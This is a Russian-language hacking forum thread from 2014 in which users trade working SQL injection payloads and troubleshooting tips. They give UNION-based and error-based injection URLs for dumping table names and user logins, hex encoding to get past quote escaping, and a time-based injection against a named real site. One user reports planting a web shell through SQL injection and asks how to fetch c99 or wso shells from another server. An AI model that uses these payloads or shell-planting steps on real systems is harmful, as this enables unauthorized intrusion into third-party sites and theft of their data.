ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.07.2014, 01:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
12164
Репутация:
1
|
|
Сообщение от XAMEHA
XAMEHA said:
billybonse,
А после чего появилась такая ошибка? Что получается выводить, а что нет?
Таблицы и колонки вывел нормально, а когда сформировал запрос, дал ошибку. Хоть убейте, не могу понять с чем это связано. На mod_security вроде не похоже.
|
|
|
|
24.07.2014, 02:30
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от mailbrush
mailbrush said:
Если имеется ввиду "--" как однострочный коммент, то в MySQL для корректной обработки запроса использование пробела в конце обязательно.
mailbrush,Вам тоже лучше не отвечать, когда не знаете правильного ответа на вопрос. Всем лучше не отвечать, и тем более не спорить.
После -- по документации обязательно наличие пробельного символа, но не пробела. Кроме того, "--" может работать и без него:
Код:
Code:
SELECT * FROM information_schema.tables WHERE uid=1--/**/and id=3;
Сообщение от billybonse
billybonse said:
Таблицы и колонки вывел нормально, а когда сформировал запрос, дал ошибку. Хоть убейте, не могу понять с чем это связано. На mod_security вроде не похоже.
Запутался, а на какие ваши вопросы ещё нужны ответы и к какому относится этот ответ?
То, что таблицы не существует возможно связано с тем, что имя БД берут из TABLE_SCHEMA, а не database().
|
|
|
24.07.2014, 02:43
|
|
Guest
Сообщений: n/a
Провел на форуме:
12164
Репутация:
1
|
|
ok, такой вопрос
опять нашел иньекцию, раскручиваю http://www.site.com/gallery.php?id=-3+union+select+1,table_name,3,4%20from%20informati on_schema.tables%20limit%2040,1%20--
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?
|
|
|
|
24.07.2014, 02:52
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
billybonse,Кавычки экранируются, нельзя их использовать стандартным способом в запросе. Если необходимо использовать строку, то используйте HEX (0x...).
При раскрутке обращайте внимание на строку ошибки, возможно запросов несколько.
|
|
|
|
24.07.2014, 02:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Сообщение от billybonse
billybonse said:
ok, такой вопрос
опять нашел иньекцию, раскручиваю http://www.site.com/gallery.php?id=-3+union+select+1,table_name,3,4%20from%20informati on_schema.tables%20limit%2040,1%20--
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?
Код:
Code:
http://xn----itbkhedijai2ag0kya.xn--p1ai/gallery.php?id=-3+union+select+1,group_concat(table_name),3,4+from+information_schema.tables+where+table_schema=database()--
Тут нет таблицы users.
В соседней базе есть, но она пуста.
|
|
|
|
24.07.2014, 06:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Прежде всего, с ходу внесу лепту в старую как мир тему с пробелами посте однострочный mysql-style комментариев. Я, может, и не тяну на уровень гроссмейстеров кавычки с красноточек, но кусок документации об этом уже привели (более того, примерно в этой же теме десятками страниц назад я его уже приводил).
В переводе на простой и всем понятный русский, после mysql-style комментария в виде двух минусов(тире\дефисов?) должен стоять пробельный символ, которым может быть перенос строки, конец строки и вообще вся веселая группа пробельных ascii-символов. Как минимум, это то, что говорит документация, и то, что подтверждается практикой на нескольких mysql-серверах пятой ветки.
Непосредственно же при инъекции пробел ставить иногда не обязательно тупо потому, что необходимый символ уже вставляется в запрос.
Касательно же пустого многострочного комментария - он заменяется на один пробел, что также может использоваться как замена пробелам.
Сообщение от None
Выдает users
Дальше пишу
http://www.site.com/gallery.php?id=-3+union+select+1,column_name,3,4%20from%20informat ion_schema.columns%20where%20table_name=%27users%2 7%20limit%200,1%20--
Пишет Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in /home/host1222787/xn----itbkhedijai2ag0kya.xn--p1ai/htdocs/www/cgi-bin/gallery.php on line 14
В чем моя ошибка?
Таблица, вероятно, из другой базы, ваш же первый запрос выводит только имена.
Сообщение от None
Точно такой же запрос, для получения логина
Цитата:
site.ru/?page=19 and(select 1 from(select count(*),concat((select (select (select concat(0x27,0x7e,user.login,0x27,0x7e) from `db_site`.user Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
На что выдает ошибку Subquery returns more than 1 row
Как ни странно, подзапрос возвращает больше одного ряда. Используйте однозначные запросы, лимиты по возможности или concat для объединения.
Сообщение от None
madhatter, спасибо за ответ.
И еще вопрос.
Нашел уязвимость, таблица phpbb_acl_users, колонка user_id
Пишу http://www.site.com/pages.php?id=-10%20union%20select%201,user_id,3,4,5,6,7,8,9,10%2 0from%20phpbb_acl_users%20limit%200,1--
Выдает ошибку Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/mamacass/public_html/pages.php on line 12
Что я делаю не так?
Запрос завернулся в false - ошибка при выполнении. |
|
|
|
24.07.2014, 11:20
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
http://www.grc.tomsk.ru/
уязвимость в post параметре vote[2][]=6
time based, дальше определения имени базы "u87_sql1" неичего не получается, помогите разобраться
|
|
|
|
24.07.2014, 14:44
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от Br@!ns
Br@!ns said:
http://www.grc.tomsk.ru/
уязвимость в post параметре vote[2][]=6
time based, дальше определения имени базы "u87_sql1" неичего не получается, помогите разобраться
Запрос имеет вид, дальше не крутил
6' and if(ascii(substring((database()),5,1))
|
|
|
|
24.07.2014, 20:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
Cтолкнулся с проблемой.
Залил минишелл через скулю с file_priv
пытаюсь залиться нормально.
Include - неработает
copy - неработает
file_put_contents - не работает
wget и curl тодже не работают
wget создает пустые файлы curl вообще ничего не создает.
Возможно едо в кривости рук.
Но поскажите ещё функции чтоли через которые можно скопировать код шелла с другого сервера в файл.
|
|
|
|
24.07.2014, 20:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
php 4 ветки phpinfo с xss
смог заинклудить c99 а wso никак не хочет выскаквает ошибка синтаксиса какаято.
|
|
|
|
|
|
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
Похожие темы
Линейный вид
